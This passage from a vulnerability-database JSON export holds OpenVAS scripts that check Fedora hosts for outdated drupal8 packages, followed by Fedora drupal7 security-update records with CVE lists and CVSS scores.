See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875534\");\n script_version(\"2019-04-03T06:51:54+0000\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-79bd99f9a8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-79bd99f9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-79bd99f9a8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. 
Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.13~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7600", "CVE-2019-10911", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-10910", "CVE-2019-10909", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310876320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876320", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876320\");\n script_version(\"2019-05-17T10:04:07+0000\");\n script_cve_id(\"CVE-2019-10909\", \"CVE-2019-10910\", \"CVE-2019-10911\", \"CVE-2019-11358\", \"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:04:07 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-08 02:09:58 +0000 (Wed, 08 May 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3edd7e8a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-1a3edd7e8a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present 
on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.15~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-03T01:39:08", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.60-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602"], "modified": "2018-12-03T01:39:08", "id": "FEDORA:166216048166", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EV4RZIREFWKABPNE6QLBRMUZOKCTPEP7/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-09T01:42:20", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.66-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602", "CVE-2019-11358"], "modified": "2019-05-09T01:42:20", "id": "FEDORA:3787360525AF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-02T01:36:56", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.65-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602", "CVE-2019-6341"], "modified": "2019-04-02T01:36:56", "id": "FEDORA:EB9606076005", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y4SVTVIJ33XCFQ6X6XTVMQM3NPLP2WFS/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-25T01:11:40", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.67-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2018-7602", "CVE-2019-11358", "CVE-2019-11831"], "modified": "2019-05-25T01:11:40", "id": "FEDORA:0E6FD60E1861", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Z246UWBXBEKTQUDTLRJTC7XYBIO4IBE4/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-05T20:37:11", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.59-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-05-05T20:37:11", "id": "FEDORA:9178B6014B98", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KPO4EJLZY4SDGJWGXADAUADLGFZ322GX/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2018-12-03T02:41:23", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.60-2.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2018-12-03T02:41:23", "id": "FEDORA:D90E96042F26", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/X5UKYWO2565POL24GEOZHWPYTYPN6T3S/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2013-01-28T15:03:43", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.19-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2013-01-28T15:03:43", "id": "FEDORA:5FB4B204CD", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZGJZFLGUBPTFREOUNRUQ35XMJBKRNPOC/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2013-01-28T15:09:37", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.19-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2013-01-28T15:09:37", "id": "FEDORA:B6AC321C62", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LMNJSSHJR4FNIJG4MOMXOA6HDXIZWGK6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2013-03-05T23:26:08", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.20-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2013-03-05T23:26:08", "id": "FEDORA:5C74620FE5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SQR22OZNUMVBRAIQOQKWU7L4UXSWPCZI/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2012-06-02T03:53:22", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: drupal7-7.14-2.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-06-02T03:53:22", "id": "FEDORA:EED772139C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MF6OZZTXMNKU47Y6NWRFQL4R5WBRJLRO/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2012-06-03T23:24:18", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.14-2.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-06-03T23:24:18", "id": "FEDORA:5177721081", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LVR46VE7X3KL2EEPVJAHX5E4JCAHEEIG/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2019-03-06T06:58:56", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.64-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-06T06:58:56", "id": "FEDORA:0237760A2394", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QLDL4RPEK6NZBNPCXUVPH5DPWLROWFJ6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2012-10-28T00:58:28", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.16-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-10-28T00:58:28", "id": "FEDORA:73B74211EF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RCEK6QMYYFFISXJ4S4WJX23H6VC5MUNL/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2012-10-28T00:58:18", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.16-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-10-28T00:58:18", "id": "FEDORA:2189021027", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GXZQYXRBY675CLK6KQ5CLJ7HVT4WGMMP/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2012-06-02T03:52:43", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.14-2.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-06-02T03:52:43", "id": "FEDORA:32E6221306", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/P52YCHNFXUTM6GATOCA6PMYPMH6D6DAK/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-05-09T03:18:10", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.66-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2019-11358"], "modified": "2019-05-09T03:18:10", "id": "FEDORA:3230260BA78B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and 